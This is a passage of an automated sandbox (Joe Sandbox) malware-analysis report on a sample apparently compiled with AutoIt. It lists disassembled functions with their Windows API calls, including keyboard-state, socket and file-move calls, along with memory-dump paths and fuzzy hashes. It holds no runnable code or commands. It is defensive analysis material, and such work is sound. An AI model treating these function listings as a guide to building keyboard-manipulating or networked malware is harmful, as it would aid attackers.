                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,004D17FB,?,004D17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 004D16E4
                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004D17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 004D16FB
                                        • Part of subcall function 004C3820: RtlAllocateHeap.NTDLL(00000000,?,00561444,?,004AFDF5,?,?,0049A976,00000010,00561440,004913FC,?,004913C6,?,00491129), ref: 004C3852
                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004D17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 004D1777
                                      • __freea.LIBCMT ref: 004D17A2
                                      • __freea.LIBCMT ref: 004D17AE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                      • String ID:
                                      • API String ID: 2829977744-0
                                      • Opcode ID: e03c339712c53286618b479f2727a51bca3e896a2e0790e688c01f6d93fc57ab
                                      • Instruction ID: 8e850e0db08a7e3316ac76823730b9e6cafcb25ace1e91f395062ec01747fda7
                                      • Opcode Fuzzy Hash: e03c339712c53286618b479f2727a51bca3e896a2e0790e688c01f6d93fc57ab
                                      • Instruction Fuzzy Hash: AB91C271E00206BADB208E64D9A1EEF7BB5AF49310F18465BEC05E7361D72DCC45CB68
                                      Function 00514523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Variant$ClearInit
                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                      • API String ID: 2610073882-625585964
                                      • Opcode ID: 7cfcc631fc8653054aa70ad0dd1d3ecc510c38b7f8b8cc59a20821194326b613
                                      • Instruction ID: 2c986db9df6ad7758a50a5a10314707b70780cac0bba3abe2986fc236e4e71cd
                                      • Opcode Fuzzy Hash: 7cfcc631fc8653054aa70ad0dd1d3ecc510c38b7f8b8cc59a20821194326b613
                                      • Instruction Fuzzy Hash: C6917F71A00219ABEF20CFA5D884FEEBFB8FF46715F108559E505AB281D7709985CFA0
                                      Function 00501187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                      Download Yara Rule
                                      APIs
                                      • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0050125C
                                      • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00501284
                                      • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 005012A8
                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 005012D8
                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0050135F
                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 005013C4
                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00501430
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: ArraySafe$Data$Access$UnaccessVartype
                                      • String ID:
                                      • API String ID: 2550207440-0
                                      • Opcode ID: d351fd5ce0de5ca215494ad44a544abf98448e45df624c4422e49f4ede536f66
                                      • Instruction ID: 02e89fb3775a7464cb81a9a9723d7ced6ba7d4a0856150ad60e7e6c238d61970
                                      • Opcode Fuzzy Hash: d351fd5ce0de5ca215494ad44a544abf98448e45df624c4422e49f4ede536f66
                                      • Instruction Fuzzy Hash: AA913375A00609AFDB00DF95C884BBEBBB5FF45315F10442AE900EB2E1D778E941CB9A
                                      Function 004A948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: ObjectSelect$BeginCreatePath
                                      • String ID:
                                      • API String ID: 3225163088-0
                                      • Opcode ID: 31aa14c93ba5252c4a1aff9f9073537a6bb9a3ce034e5ceac43e08313f818226
                                      • Instruction ID: 19f69b2535e49ecf9cc5f87912216c538ade62f71d7f40eab00e188eb94b29ab
                                      • Opcode Fuzzy Hash: 31aa14c93ba5252c4a1aff9f9073537a6bb9a3ce034e5ceac43e08313f818226
                                      • Instruction Fuzzy Hash: 18913771D00219AFCB10CFA9C885AEEBBB9FF4A320F14444AE915B7251D378AD42CB64
                                      Function 00513947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                                      Download Yara Rule
                                      APIs
                                      • VariantInit.OLEAUT32(?), ref: 0051396B
                                      • CharUpperBuffW.USER32(?,?), ref: 00513A7A
                                      • _wcslen.LIBCMT ref: 00513A8A
                                      • VariantClear.OLEAUT32(?), ref: 00513C1F
                                        • Part of subcall function 00500CDF: VariantInit.OLEAUT32(00000000), ref: 00500D1F
                                        • Part of subcall function 00500CDF: VariantCopy.OLEAUT32(?,?), ref: 00500D28
                                        • Part of subcall function 00500CDF: VariantClear.OLEAUT32(?), ref: 00500D34
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                      • API String ID: 4137639002-1221869570
                                      • Opcode ID: e5198a1855f6927c7d62ad331bd482a3701b6d2ec731d41dad60bcda65bb6253
                                      • Instruction ID: 6fbf4751223d1b1d3637f058ff1be6d047ca0d29c9b67a201bd0d5823be0342e
                                      • Opcode Fuzzy Hash: e5198a1855f6927c7d62ad331bd482a3701b6d2ec731d41dad60bcda65bb6253
                                      • Instruction Fuzzy Hash: 4E916C746083059FDB00DF29C49496ABBE4FF89318F14886EF88A97351DB34EE45CB92
                                      Function 00514BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004F000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,004EFF41,80070057,?,?,?,004F035E), ref: 004F002B
                                        • Part of subcall function 004F000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004EFF41,80070057,?,?), ref: 004F0046
                                        • Part of subcall function 004F000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004EFF41,80070057,?,?), ref: 004F0054
                                        • Part of subcall function 004F000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004EFF41,80070057,?), ref: 004F0064
                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00514C51
                                      • _wcslen.LIBCMT ref: 00514D59
                                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00514DCF
                                      • CoTaskMemFree.OLE32(?), ref: 00514DDA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                      • String ID: NULL Pointer assignment
                                      • API String ID: 614568839-2785691316
                                      • Opcode ID: ba47b960c1b9254b643f8f7e7b1339fdbf573433a3b00738b74c271818962140
                                      • Instruction ID: cc6d2a32f63936b5818cde8a69c4f427a1a295cbe76abf970a0e4e522709eaa9
                                      • Opcode Fuzzy Hash: ba47b960c1b9254b643f8f7e7b1339fdbf573433a3b00738b74c271818962140
                                      • Instruction Fuzzy Hash: FC912871D0021D9FEF10DFA5D891AEEBBB9BF08304F10856AE915A7251DB345E45CFA0
                                      Function 005220FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetMenu.USER32(?), ref: 00522183
                                      • GetMenuItemCount.USER32(00000000), ref: 005221B5
                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 005221DD
                                      • _wcslen.LIBCMT ref: 00522213
                                      • GetMenuItemID.USER32(?,?), ref: 0052224D
                                      • GetSubMenu.USER32(?,?), ref: 0052225B
                                        • Part of subcall function 004F3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 004F3A57
                                        • Part of subcall function 004F3A3D: GetCurrentThreadId.KERNEL32 ref: 004F3A5E
                                        • Part of subcall function 004F3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,004F25B3), ref: 004F3A65
                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 005222E3
                                        • Part of subcall function 004FE97B: Sleep.KERNEL32 ref: 004FE9F3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                      • String ID:
                                      • API String ID: 4196846111-0
                                      • Opcode ID: d1ad8f24be1fd12fd39eb176fa737cb14856e19f922844c098a351d4cf1b33a9
                                      • Instruction ID: 1fed83c405e98b8859530e6f73bd4dcf20e2cee78a01d3f876fb2ff553814198
                                      • Opcode Fuzzy Hash: d1ad8f24be1fd12fd39eb176fa737cb14856e19f922844c098a351d4cf1b33a9
                                      • Instruction Fuzzy Hash: 53718E79A00215EFCB14DFA5D881AAEBBF1FF49314F108469E816EB391D735E941CB90
                                      Function 004FAEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetParent.USER32(?), ref: 004FAEF9
                                      • GetKeyboardState.USER32(?), ref: 004FAF0E
                                      • SetKeyboardState.USER32(?), ref: 004FAF6F
                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 004FAF9D
                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 004FAFBC
                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 004FAFFD
                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 004FB020
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: MessagePost$KeyboardState$Parent
                                      • String ID:
                                      • API String ID: 87235514-0
                                      • Opcode ID: fdec7ade6afea0e9181c2f3fc38c4c82930d98769247e75d362498a0724549ba
                                      • Instruction ID: 0a1b0a3015fbd5b714a06ab49f271d5c0eedb0b7cd74a74467b4a5ac4ae72e27
                                      • Opcode Fuzzy Hash: fdec7ade6afea0e9181c2f3fc38c4c82930d98769247e75d362498a0724549ba
                                      • Instruction Fuzzy Hash: D751B4E06047D93DFB364234CC45BBB7EA99B06304F08858AE2D9595C2C79CACD8D7A9
                                      Function 004FACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetParent.USER32(00000000), ref: 004FAD19
                                      • GetKeyboardState.USER32(?), ref: 004FAD2E
                                      • SetKeyboardState.USER32(?), ref: 004FAD8F
                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 004FADBB
                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 004FADD8
                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 004FAE17
                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 004FAE38
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: MessagePost$KeyboardState$Parent
                                      • String ID:
                                      • API String ID: 87235514-0
                                      • Opcode ID: ae6e9d701c1d2ac717755aa1433675c02584003452329039f15e483cc2dd3bb4
                                      • Instruction ID: 0c7e18a7887c0311f88097ffa44ab61d56bcf180247a0ee27acb2eccbbceb73c
                                      • Opcode Fuzzy Hash: ae6e9d701c1d2ac717755aa1433675c02584003452329039f15e483cc2dd3bb4
                                      • Instruction Fuzzy Hash: 9A51D6E15447D93DFB368224CC45B7B7E99AB46304F08848AE2DD469C2C398ECA8D75A
                                      Function 004C542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetConsoleCP.KERNEL32(004D3CD6,?,?,?,?,?,?,?,?,004C5BA3,?,?,004D3CD6,?,?), ref: 004C5470
                                      • __fassign.LIBCMT ref: 004C54EB
                                      • __fassign.LIBCMT ref: 004C5506
                                      • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,004D3CD6,00000005,00000000,00000000), ref: 004C552C
                                      • WriteFile.KERNEL32(?,004D3CD6,00000000,004C5BA3,00000000,?,?,?,?,?,?,?,?,?,004C5BA3,?), ref: 004C554B
                                      • WriteFile.KERNEL32(?,?,00000001,004C5BA3,00000000,?,?,?,?,?,?,?,?,?,004C5BA3,?), ref: 004C5584
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                      • String ID:
                                      • API String ID: 1324828854-0
                                      • Opcode ID: f9017e0a28e2e03a2e3158579e2798d84e8601a392e03f31f87fe9a7013954f1
                                      • Instruction ID: 17bf2a3a51d9b946ea84698eab94dbb6a81a6fc61b91c5bd06fb0e326c6bbeb3
                                      • Opcode Fuzzy Hash: f9017e0a28e2e03a2e3158579e2798d84e8601a392e03f31f87fe9a7013954f1
                                      • Instruction Fuzzy Hash: E851C1B4A00608AFDB20CFA8D845FEEBBF9EF19300F14451FE555E7291D674AA81CB64
                                      Function 005110B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0051304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0051307A
                                        • Part of subcall function 0051304E: _wcslen.LIBCMT ref: 0051309B
                                      • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00511112
                                      • WSAGetLastError.WSOCK32 ref: 00511121
                                      • WSAGetLastError.WSOCK32 ref: 005111C9
                                      • closesocket.WSOCK32(00000000), ref: 005111F9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                      • String ID:
                                      • API String ID: 2675159561-0
                                      • Opcode ID: 5dff4bc10a4b371178368bd8ab4b8fbf4af816dcc5ab94d050df44d464253385
                                      • Instruction ID: 14522c4c63bfe84381aa67a333ffc6544038fd92340289a2ba9dece3d913565f
                                      • Opcode Fuzzy Hash: 5dff4bc10a4b371178368bd8ab4b8fbf4af816dcc5ab94d050df44d464253385
                                      • Instruction Fuzzy Hash: 9E41C631600604AFEB109F14C884BE9BFE9FF45368F148059FA159B292D774AD85CBE5
                                      Function 004FCF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004FDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,004FCF22,?), ref: 004FDDFD
                                        • Part of subcall function 004FDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,004FCF22,?), ref: 004FDE16
                                      • lstrcmpiW.KERNEL32(?,?), ref: 004FCF45
                                      • MoveFileW.KERNEL32(?,?), ref: 004FCF7F
                                      • _wcslen.LIBCMT ref: 004FD005
                                      • _wcslen.LIBCMT ref: 004FD01B
                                      • SHFileOperationW.SHELL32(?), ref: 004FD061
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                      • String ID: \*.*
                                      • API String ID: 3164238972-1173974218
                                      • Opcode ID: 71e13fa3cb8c76b2ce513df8791214fb8dff97184e72afd6bcf3389be582dad2
                                      • Instruction ID: 86f542b51ebc9ff307ff6e37fce77a93a3fc7e0a71e40b53b39ca721d6f4ade2
                                      • Opcode Fuzzy Hash: 71e13fa3cb8c76b2ce513df8791214fb8dff97184e72afd6bcf3389be582dad2
                                      • Instruction Fuzzy Hash: B6415A71D0511C5FDF12EBA5CE81AEEB7B9AF04344F0000EBE605E7152EB38A649CB65
                                      Function 00522DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00522E1C
                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00522E4F
                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00522E84
                                      • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00522EB6
                                      • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00522EE0
                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00522EF1
                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00522F0B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
